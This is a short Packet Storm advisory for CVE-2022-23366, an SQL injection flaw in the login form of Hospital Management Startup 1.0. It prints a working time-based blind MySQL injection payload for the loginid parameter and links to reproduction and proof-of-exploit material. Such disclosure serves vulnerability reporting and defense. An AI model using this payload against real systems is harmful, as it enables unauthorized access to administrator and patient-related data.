Hospital Management Startup version 1.0 suffers from a remote SQL injection vulnerability.
51566aef1b6d845b63551e8b175e2186a22e468a99735b5d7dfd0213a5aacfe8## Title: Hospital Management Startup v1.0 remote SQL-Injections
## Author: nu11secur1ty
## Date: 02.10.2022
## Vendor: https://github.com/kabirkhyrul
## Software: https://github.com/kabirkhyrul/HMS
## CVE-2022-23366
## Description:
The loginid and password parameters from Hospital Management Startup
1.0 appear to be vulnerable to SQL injection attacks.
The attacker can retrieve all information from the administrator
account of the system and he can use the information for malicious
purposes!
WARNING: If this is in some external domain, or some subdomain, or
internal, this will be extremely dangerous!
Status: CRITICAL
[+] Payloads:
```mysql
---
Parameter: loginid (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: loginid=hackedpassword=hacked' or '6681'='6681' AND
(SELECT 1959 FROM (SELECT(SLEEP(3)))PuyC) AND
'sDHP'='sDHP&rememberme=on&submit=Login
---
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-23366)
## Proof and Exploit:
[href](https://streamable.com/hri9eo)
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed